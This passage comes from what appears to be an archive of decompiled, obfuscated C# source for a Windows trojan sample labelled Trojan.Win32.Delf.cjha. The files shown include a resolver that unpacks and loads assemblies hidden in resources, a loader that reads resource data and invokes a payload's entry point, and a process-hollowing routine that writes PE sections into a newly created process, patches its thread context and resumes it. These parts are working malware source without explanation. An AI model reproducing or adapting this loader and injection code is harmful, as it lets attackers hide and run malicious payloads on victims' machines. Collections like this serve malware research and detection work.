while (index7 < num8);
}
numArray2[index6] = num6 + (1 << 16 - index6);
}
}
}
public int \u0003([In] \u0002.\u0001.\u0002 obj0)
{
int index;
if ((index = obj0.\u0003(9)) >= 0)
{
int num1;
if ((num1 = (int) this.\u0001[index]) >= 0)
{
obj0.\u0003(num1 & 15);
return num1 >> 4;
}
int num2 = -(num1 >> 4);
int num3 = num1 & 15;
int num4;
if ((num4 = obj0.\u0003(num3)) >= 0)
{
int num5 = (int) this.\u0001[num2 | num4 >> 9];
obj0.\u0003(num5 & 15);
return num5 >> 4;
}
int num6 = obj0.\u0003();
int num7 = obj0.\u0003(num6);
int num8 = (int) this.\u0001[num2 | num7 >> 9];
if ((num8 & 15) > num6)
return -1;
obj0.\u0003(num8 & 15);
return num8 >> 4;
}
int num9 = obj0.\u0003();
int num10 = (int) this.\u0001[obj0.\u0003(num9)];
if (num10 < 0 || (num10 & 15) > num9)
return -1;
obj0.\u0003(num10 & 15);
return num10 >> 4;
}
}
internal class \u0005
{
private static readonly int[] \u0001 = new int[3]
{
3,
3,
11
};
private static readonly int[] \u0002 = new int[3]
{
2,
3,
7
};
private byte[] \u0001;
private byte[] \u0002;
private \u0002.\u0001.\u0004 \u0001;
private int \u0001;
private int \u0002;
private int \u0003;
private int \u0004;
private int \u0005;
private int \u0006;
private byte \u0001;
private int \u0007;
private static readonly int[] \u0003 = new int[19]
{
16,
17,
18,
0,
8,
7,
9,
6,
10,
5,
11,
4,
12,
3,
13,
2,
14,
1,
15
};
public bool \u0003([In] \u0002.\u0001.\u0002 obj0)
{
while (true)
{
switch (this.\u0001)
{
case 0:
this.\u0002 = obj0.\u0003(5);
if (this.\u0002 >= 0)
{
this.\u0002 += 257;
obj0.\u0003(5);
this.\u0001 = 1;
goto case 1;
}
else
goto label_2;
case 1:
this.\u0003 = obj0.\u0003(5);
if (this.\u0003 >= 0)
{
++this.\u0003;
obj0.\u0003(5);
this.\u0005 = this.\u0002 + this.\u0003;
this.\u0002 = new byte[this.\u0005];
this.\u0001 = 2;
goto case 2;
}
else
goto label_5;
case 2:
this.\u0004 = obj0.\u0003(4);
if (this.\u0004 >= 0)
{
this.\u0004 += 4;
obj0.\u0003(4);
this.\u0001 = new byte[19];
this.\u0007 = 0;
this.\u0001 = 3;
goto case 3;
}
else
goto label_8;
case 3:
for (; this.\u0007 < this.\u0004; ++this.\u0007)
{
int num = obj0.\u0003(3);
if (num < 0)
return false;
obj0.\u0003(3);
this.\u0001[\u0002.\u0001.\u0005.\u0003[this.\u0007]] = (byte) num;
}
this.\u0001 = new \u0002.\u0001.\u0004(this.\u0001);
this.\u0001 = (byte[]) null;
this.\u0007 = 0;
this.\u0001 = 4;
goto case 4;
case 4:
int num1;
while (((num1 = this.\u0001.\u0003(obj0)) & -16) == 0)
{
this.\u0002[this.\u0007++] = this.\u0001 = (byte) num1;
if (this.\u0007 == this.\u0005)
return true;
}
if (num1 >= 0)
{
if (num1 >= 17)
this.\u0001 = (byte) 0;
this.\u0006 = num1 - 16;
this.\u0001 = 5;
goto case 5;
}
else
goto label_19;
case 5:
int num2 = \u0002.\u0001.\u0005.\u0002[this.\u0006];
int num3 = obj0.\u0003(num2);
if (num3 >= 0)
{
obj0.\u0003(num2);
int num4 = num3 + \u0002.\u0001.\u0005.\u0001[this.\u0006];
while (num4-- > 0)
this.\u0002[this.\u0007++] = this.\u0001;
if (this.\u0007 != this.\u0005)
{
this.\u0001 = 4;
continue;
}
goto label_29;
}
else
goto label_24;
default:
continue;
}
}
label_2:
return false;
label_5:
return false;
label_8:
return false;
label_19:
return false;
label_24:
return false;
label_29:
return true;
}
public \u0002.\u0001.\u0004 \u0003()
{
byte[] destinationArray = new byte[this.\u0002];
Array.Copy((Array) this.\u0002, 0, (Array) destinationArray, 0, this.\u0002);
return new \u0002.\u0001.\u0004(destinationArray);
}
public \u0002.\u0001.\u0004 \u0004()
{
byte[] destinationArray = new byte[this.\u0003];
Array.Copy((Array) this.\u0002, this.\u0002, (Array) destinationArray, 0, this.\u0003);
return new \u0002.\u0001.\u0004(destinationArray);
}
}
internal class \u0006 : MemoryStream
{
public int \u0003() => this.ReadByte() | this.ReadByte() << 8;
public int \u0004() => this.\u0003() | this.\u0003() << 16;
public \u0006([In] byte[] obj0)
: base(obj0, false)
{
}
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0002/_0002.cs
+180
View File
@@ -0,0 +1,180 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0002;
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0002
{
internal class \u0002
{
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
private static extern bool \u0003([In] string obj0, [In] string obj1, [In] int obj2);
internal static Assembly \u0003([In] object obj0, [In] ResolveEventArgs obj1)
{
\u0002.\u0002.\u0001 obj = new \u0002.\u0002.\u0001(obj1.Name);
string base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0003(false)));
string[] strArray = \u0001.\u0001.\u0003(43002).Split(',');
string name = string.Empty;
bool flag1 = false;
bool flag2 = false;
bool flag3 = false;
for (int index = 0; index < strArray.Length - 1; index += 2)
{
if (strArray[index] == base64String)
{
name = strArray[index + 1];
if (name[0] == '[')
{
int num = name.IndexOf(']');
string str = name.Substring(1, num - 1);
flag1 = str.IndexOf('z') >= 0;
flag2 = str.IndexOf('g') >= 0;
flag3 = str.IndexOf('t') >= 0;
name = name.Substring(num + 1);
break;
}
break;
}
}
if (name.Length > 0)
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
if (manifestResourceStream != null)
{
int length = (int) manifestResourceStream.Length;
byte[] numArray = new byte[length];
manifestResourceStream.Read(numArray, 0, length);
if (flag1)
numArray = \u0002.\u0001.\u0003(numArray);
if (flag2)
{
try
{
string path1 = string.Format(\u0001.\u0001.\u0003(43220), (object) Path.GetTempPath(), (object) name);
Directory.CreateDirectory(path1);
string path2 = path1 + obj.\u0001 + \u0001.\u0001.\u0003(43233);
if (!File.Exists(path2))
{
Assembly assembly = (Assembly) null;
FileStream fileStream = File.OpenWrite(path2);
fileStream.Write(numArray, 0, numArray.Length);
fileStream.Close();
if (\u0003.\u0003(path2) == 0)
assembly = Assembly.Load(obj.\u0003(true));
File.Delete(path2);
Directory.Delete(path1);
if ((object) assembly != null)
return assembly;
}
}
catch
{
}
}
Assembly assembly1 = (Assembly) null;
if (!flag3)
{
try
{
assembly1 = Assembly.Load(numArray);
}
catch (FileLoadException ex)
{
flag3 = true;
}
catch (BadImageFormatException ex)
{
flag3 = true;
}
}
if (flag3)
{
try
{
string path3 = string.Format(\u0001.\u0001.\u0003(43220), (object) Path.GetTempPath(), (object) name);
Directory.CreateDirectory(path3);
string path4 = path3 + obj.\u0001 + \u0001.\u0001.\u0003(43233);
if (!File.Exists(path4))
{
FileStream fileStream = File.OpenWrite(path4);
fileStream.Write(numArray, 0, numArray.Length);
fileStream.Close();
\u0002.\u0002.\u0003(path4, (string) null, 4);
\u0002.\u0002.\u0003(path3, (string) null, 4);
}
assembly1 = Assembly.LoadFile(path4);
}
catch
{
}
}
return assembly1;
}
}
return (Assembly) null;
}
internal struct \u0001
{
public string \u0001;
public Version \u0001;
public string \u0002;
public string \u0003;
public string \u0003([In] bool obj0)
{
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append(this.\u0001);
if (obj0)
{
stringBuilder.Append(\u0001.\u0001.\u0003(43242));
stringBuilder.Append((object) this.\u0001);
}
stringBuilder.Append(\u0001.\u0001.\u0003(43259));
stringBuilder.Append(this.\u0002.Length == 0 ? \u0001.\u0001.\u0003(43276) : this.\u0002);
stringBuilder.Append(\u0001.\u0001.\u0003(43289));
stringBuilder.Append(this.\u0003.Length == 0 ? \u0001.\u0001.\u0003(43314) : this.\u0003);
return stringBuilder.ToString();
}
public \u0001([In] string obj0)
{
this.\u0001 = new Version();
this.\u0002 = string.Empty;
this.\u0003 = string.Empty;
this.\u0001 = string.Empty;
string str1 = obj0;
char[] chArray = new char[1]{ ',' };
foreach (string str2 in str1.Split(chArray))
{
string str3 = str2.Trim();
if (str3.StartsWith(\u0001.\u0001.\u0003(43323)))
this.\u0001 = new Version(str3.Substring(8));
else if (str3.StartsWith(\u0001.\u0001.\u0003(43336)))
{
this.\u0002 = str3.Substring(8);
if (this.\u0002 == \u0001.\u0001.\u0003(43276))
this.\u0002 = string.Empty;
}
else if (str3.StartsWith(\u0001.\u0001.\u0003(43349)))
{
this.\u0003 = str3.Substring(15);
if (this.\u0003 == \u0001.\u0001.\u0003(43314))
this.\u0003 = string.Empty;
}
else
this.\u0001 = str3;
}
}
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0002/_0003.cs
+176
View File
@@ -0,0 +1,176 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0002;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace \u0002
{
internal class \u0003
{
[DllImport("fusion", EntryPoint = "CreateAssemblyCache", CharSet = CharSet.Auto)]
internal static extern int \u0003([In] ref \u0003.\u0007 obj0, [In] uint obj1);
public static int \u0003([In] string obj0)
{
\u0003.\u0007 obj = (\u0003.\u0007) null;
int num = \u0003.\u0003(ref obj, 0U);
return num != 0 ? num : obj.\u0002(0U, obj0, IntPtr.Zero);
}
public struct \u0001
{
public int \u0001;
public int \u0002;
}
public struct \u0002
{
public \u0003.\u0001 \u0001;
public long \u0001;
public Guid \u0001;
public \u0003.\u0001 \u0002;
public int \u0001;
public int \u0002;
public int \u0003;
public \u0003.\u0001 \u0003;
public string \u0001;
public int \u0004;
public int \u0005;
}
[Guid("0000000c-0000-0000-C000-000000000046")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
[ComImport]
public interface \u0003
{
void \u0001(IntPtr pv, uint cb, out uint pcbRead);
void \u0002(IntPtr pv, uint cb, out uint pcbWritten);
void \u0001(long dlibMove, uint dwOrigin, out ulong plibNewPosition);
void \u0001(ulong libNewSize);
void \u0001(\u0003.\u0003 pstm, ulong cb, out ulong pcbRead, out ulong pcbWritten);
void \u0001(uint grfCommitFlags);
void \u0001();
void \u0001(ulong libOffset, ulong cb, uint dwLockType);
void \u0002(ulong libOffset, ulong cb, uint dwLockType);
void \u0001(out \u0003.\u0002 pstatstg, uint grfStatFlag);
void \u0001(out \u0003.\u0003 ppstm);
}
[Guid("7c23ff90-33af-11d3-95da-00a024a85b51")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
[ComImport]
internal interface \u0004
{
void \u0001(\u0003.\u0005 pName);
void \u0001(out \u0003.\u0005 ppName);
void \u0001([MarshalAs(UnmanagedType.LPWStr)] string szName, int pvValue, uint cbValue, uint dwFlags);
void \u0001([MarshalAs(UnmanagedType.LPWStr)] string szName, out int pvValue, ref uint pcbValue, uint dwFlags);
void \u0001(out int wzDynamicDir, ref uint pdwSize);
}
[Guid("CD193BC0-B4BC-11d2-9833-00C04FC31D2E")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
[ComImport]
internal interface \u0005
{
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(uint PropertyId, IntPtr pvProperty, uint cbProperty);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(uint PropertyId, IntPtr pvProperty, ref uint pcbProperty);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001();
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(IntPtr szDisplayName, ref uint pccDisplayName, uint dwDisplayFlags);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(
object refIID,
object pAsmBindSink,
\u0003.\u0004 pApplicationContext,
[MarshalAs(UnmanagedType.LPWStr)] string szCodeBase,
long llFlags,
int pvReserved,
uint cbReserved,
out int ppv);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(out uint lpcwBuffer, out int pwzName);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(out uint pdwVersionHi, out uint pdwVersionLow);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(\u0003.\u0005 pName, uint dwCmpFlags);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(out \u0003.\u0005 pName);
}
[Guid("9e3aaeb4-d1cd-11d2-bab9-00c04f8eceae")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
[ComImport]
internal interface \u0006
{
void \u0001(
[MarshalAs(UnmanagedType.LPWStr)] string pszName,
uint dwFormat,
uint dwFlags,
uint dwMaxSize,
out \u0003.\u0003 ppStream);
void \u0002(\u0003.\u0005 pName);
void \u0001(uint dwFlags);
void \u0002(uint dwFlags);
}
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
[Guid("e707dcde-d1cd-11d2-bab9-00c04f8eceae")]
[ComImport]
internal interface \u0007
{
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(uint dwFlags, [MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName, IntPtr pvReserved, out uint pulDisposition);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(uint dwFlags, [MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName, IntPtr pAsmInfo);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(
uint dwFlags,
IntPtr pvReserved,
out \u0003.\u0006 ppAsmItem,
[MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(out object ppAsmScavenger);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0002(uint dwFlags, [MarshalAs(UnmanagedType.LPWStr)] string pszManifestFilePath, IntPtr pvReserved);
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0003/_0001.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using System;
namespace \u0003
{
internal class \u0001
{
public static void \u0003() => AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u0002.\u0002.\u0003);
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0003/_0002.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0003;
using System.Runtime.InteropServices;
namespace \u0003
{
internal class \u0002
{
internal static \u0002.\u0001 \u0001;
internal static \u0002.\u0001 \u0002;
internal static \u0002.\u0002 \u0001;
internal static \u0002.\u0002 \u0002;
internal static \u0002.\u0003 \u0001;
internal static \u0002.\u0004 \u0001;
internal static \u0002.\u0004 \u0002;
internal static \u0002.\u0005 \u0001;
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0001
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0002
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0003
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0004
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0005
{
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0003/_0003.cs
+88
View File
@@ -0,0 +1,88 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0004;
using \u0005;
using System;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0003
{
internal class \u0003
{
private static \u0003.\u0003.\u0005 \u0001;
private static \u0003.\u0003.\u0002 \u0001;
private static \u0003.\u0003.\u0001 \u0001;
private static \u0003.\u0003.\u0003 \u0001;
private static \u0003.\u0003.\u0004 \u0001;
public static void \u0003([In] string[] obj0)
{
byte[] numArray1 = new byte[0];
string str1 = string.Join(Convert.ToChar(32).ToString(), obj0);
\u0003.\u0003.\u0001 = (\u0003.\u0003.\u0005) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0004()), typeof (\u0003.\u0003.\u0005));
\u0003.\u0003.\u0001 = (\u0003.\u0003.\u0002) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0005()), typeof (\u0003.\u0003.\u0002));
\u0003.\u0003.\u0001 = (\u0003.\u0003.\u0001) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0006()), typeof (\u0003.\u0003.\u0001));
\u0003.\u0003.\u0001 = (\u0003.\u0003.\u0003) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0007()), typeof (\u0003.\u0003.\u0003));
\u0003.\u0003.\u0001 = (\u0003.\u0003.\u0004) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0008()), typeof (\u0003.\u0003.\u0004));
try
{
string str2 = \u0003.\u0003.\u0003(104);
string str3 = \u0003.\u0003.\u0003(105);
if (str2.Length <= 0 || str3.Length <= 0)
return;
byte[] numArray2 = \u0001.\u0003(str3, str2);
if (numArray2.Length <= 0)
return;
if (\u0001.\u0003(numArray2))
\u0001.\u0003(obj0);
else
\u0004.\u0003.\u0003(numArray2, str1, \u0003.\u0003.\u0003());
}
catch
{
}
}
private static string \u0003()
{
StringBuilder stringBuilder = new StringBuilder((int) byte.MaxValue);
int num = (int) \u0003.\u0003.\u0001(IntPtr.Zero, stringBuilder, stringBuilder.Capacity);
return stringBuilder.ToString();
}
private static string \u0003([In] int obj0)
{
byte[] numArray1 = new byte[0];
byte[] numArray2;
try
{
IntPtr num1 = \u0003.\u0003.\u0001(IntPtr.Zero, (IntPtr) obj0, (IntPtr) 2);
IntPtr num2 = \u0003.\u0003.\u0001(IntPtr.Zero, num1);
IntPtr source = \u0003.\u0003.\u0001(num2);
uint length = \u0003.\u0003.\u0001(IntPtr.Zero, num1);
numArray2 = new byte[(IntPtr) length];
Marshal.Copy(source, numArray2, 0, (int) length);
}
catch
{
return string.Empty;
}
return Encoding.Default.GetString(numArray2);
}
private delegate IntPtr \u0001([In] IntPtr obj0);
private delegate IntPtr \u0002([In] IntPtr obj0, [In] IntPtr obj1);
private delegate uint \u0003([In] IntPtr obj0, [In] IntPtr obj1);
private delegate uint \u0004([In] IntPtr obj0, [In] StringBuilder obj1, [MarshalAs(UnmanagedType.U4), In] int _param3);
private delegate IntPtr \u0005([In] IntPtr obj0, [In] IntPtr obj1, [In] IntPtr obj2);
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0004/_0001.cs
+43
View File
@@ -0,0 +1,43 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0004;
using System.Reflection;
using System.Runtime.InteropServices;
namespace \u0004
{
internal class \u0001
{
private static Assembly \u0001;
public static void \u0003([In] string[] obj0)
{
try
{
\u0001.\u0001.EntryPoint.Invoke((object) null, (object[]) obj0);
}
catch
{
}
}
public static bool \u0003([In] byte[] obj0)
{
try
{
\u0001.\u0001 = Assembly.Load(obj0);
if ((object) \u0001.\u0001.EntryPoint == null)
return false;
}
catch
{
return false;
}
return true;
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0004/_0002.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using System;
using System.Runtime.InteropServices;
namespace \u0004
{
internal static class \u0002
{
[STAThread]
private static void \u0003([In] string[] obj0) => \u0003.\u0003.\u0003(obj0);
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0004/_0003.cs
+309
View File
@@ -0,0 +1,309 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0004;
using \u0005;
using System;
using System.Runtime.InteropServices;
namespace \u0004
{
internal class \u0003
{
public static void \u0003([In] byte[] obj0, [In] string obj1, [In] string obj2)
{
\u0003.\u0011 obj3 = new \u0003.\u0011();
\u0003.\u0014 obj4 = new \u0003.\u0014();
\u0003.\u0002 structure1 = new \u0003.\u0002();
\u0003.\u000F structure2 = new \u0003.\u000F();
\u0003.\u0004 obj5 = new \u0003.\u0004();
\u0003.\u0003 obj6 = new \u0003.\u0003();
structure2.\u0001 = (uint) Marshal.SizeOf((object) structure2);
obj6.\u0001 = 65543U;
GCHandle gcHandle = GCHandle.Alloc((object) obj0, GCHandleType.Pinned);
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
gcHandle.Free();
\u0003.\u0011 structure3 = (\u0003.\u0011) Marshal.PtrToStructure((IntPtr) int32, typeof (\u0003.\u0011));
\u0003.\u0014 structure4 = (\u0003.\u0014) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0001), typeof (\u0003.\u0014));
if (structure4.\u0001 != 17744U || structure3.\u0001 != (ushort) 23117)
return;
\u0003.\u0018 forFunctionPointer1 = (\u0003.\u0018) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u000E()), typeof (\u0003.\u0018));
\u0003.\u0013 forFunctionPointer2 = (\u0003.\u0013) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u000F()), \u0002.\u0010()), typeof (\u0003.\u0013));
\u0003.\u0012 forFunctionPointer3 = (\u0003.\u0012) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0011()), typeof (\u0003.\u0012));
\u0003.\u0007 forFunctionPointer4 = (\u0003.\u0007) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0012()), typeof (\u0003.\u0007));
\u0003.\u0010 forFunctionPointer5 = (\u0003.\u0010) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0013()), typeof (\u0003.\u0010));
\u0003.\u0008 forFunctionPointer6 = (\u0003.\u0008) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0014()), typeof (\u0003.\u0008));
\u0003.\u0016 forFunctionPointer7 = (\u0003.\u0016) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0015()), typeof (\u0003.\u0016));
int num1 = forFunctionPointer1(obj2, obj1, IntPtr.Zero, IntPtr.Zero, false, \u0003.\u000E.\u000F, IntPtr.Zero, (string) null, ref structure2, ref obj5) ? 1 : 0;
int num2 = forFunctionPointer2(obj5.\u0001, (IntPtr) (long) structure4.\u0001.\u0007) ? 1 : 0;
int num3 = forFunctionPointer3(obj5.\u0001, (IntPtr) (long) structure4.\u0001.\u0007, structure4.\u0001.\u0010, \u0003.\u0006.\u0001 | \u0003.\u0006.\u0002, \u0003.\u0005.\u0003) ? 1 : 0;
int num4 = forFunctionPointer4(obj5.\u0001, (IntPtr) (long) structure4.\u0001.\u0007, obj0, structure4.\u0001.\u0011, (object) null) ? 1 : 0;
for (int index1 = 0; index1 < (int) structure4.\u0001.\u0002; ++index1)
{
structure1 = (\u0003.\u0002) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0001 + Marshal.SizeOf((object) structure4) + Marshal.SizeOf((object) structure1) * index1), typeof (\u0003.\u0002));
byte[] numArray = new byte[(IntPtr) structure1.\u0003];
for (int index2 = 0; index2 < (int) structure1.\u0003; ++index2)
numArray[index2] = obj0[(long) structure1.\u0004 + (long) index2];
int num5 = forFunctionPointer4(obj5.\u0001, (IntPtr) (long) (structure4.\u0001.\u0007 + structure1.\u0002), numArray, structure1.\u0003, (object) null) ? 1 : 0;
}
int num6 = forFunctionPointer5(obj5.\u0002, ref obj6) ? 1 : 0;
byte[] bytes = BitConverter.GetBytes(structure4.\u0001.\u0007);
int num7 = forFunctionPointer4(obj5.\u0001, (IntPtr) (long) (obj6.\u0013 + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
obj6.\u0016 = structure4.\u0001.\u0007 + structure4.\u0001.\u0004;
int num8 = forFunctionPointer6(obj5.\u0002, ref obj6) ? 1 : 0;
int num9 = (int) forFunctionPointer7(obj5.\u0002);
}
private struct \u0001
{
public ushort \u0001;
public ushort \u0002;
public uint \u0001;
public uint \u0002;
public uint \u0003;
public ushort \u0003;
public ushort \u0004;
}
private struct \u0002
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public byte[] \u0001;
public uint \u0001;
public uint \u0002;
public uint \u0003;
public uint \u0004;
public uint \u0005;
public uint \u0006;
public ushort \u0001;
public ushort \u0002;
public uint \u0007;
}
private struct \u0003
{
public uint \u0001;
public uint \u0002;
public uint \u0003;
public uint \u0004;
public uint \u0005;
public uint \u0006;
public uint \u0007;
public \u0003.\u0017 \u0001;
public uint \u0008;
public uint \u000E;
public uint \u000F;
public uint \u0010;
public uint \u0011;
public uint \u0012;
public uint \u0013;
public uint \u0014;
public uint \u0015;
public uint \u0016;
public uint \u0017;
public uint \u0018;
public uint \u0019;
public uint \u001A;
public uint \u001B;
public uint \u001C;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] \u0001;
}
private struct \u0004
{
public IntPtr \u0001;
public IntPtr \u0002;
public uint \u0001;
public uint \u0002;
}
private enum \u0005 : uint
{
\u0005 = 1,
\u0006 = 2,
\u0007 = 4,
\u0008 = 8,
\u0001 = 16, // 0x00000010
\u0002 = 32, // 0x00000020
\u0003 = 64, // 0x00000040
\u0004 = 128, // 0x00000080
\u000E = 256, // 0x00000100
\u000F = 512, // 0x00000200
\u0010 = 1024, // 0x00000400
}
private enum \u0006 : uint
{
\u0001 = 4096, // 0x00001000
\u0002 = 8192, // 0x00002000
\u0003 = 524288, // 0x00080000
\u0006 = 1048576, // 0x00100000
\u0007 = 2097152, // 0x00200000
\u0005 = 4194304, // 0x00400000
\u0004 = 536870912, // 0x20000000
}
private delegate bool \u0007([In] IntPtr obj0, [In] IntPtr obj1, [In] byte[] obj2, [In] uint obj3, [In] object obj4);
private delegate bool \u0008([In] IntPtr obj0, [In] ref \u0003.\u0003 obj1);
private enum \u000E : uint
{
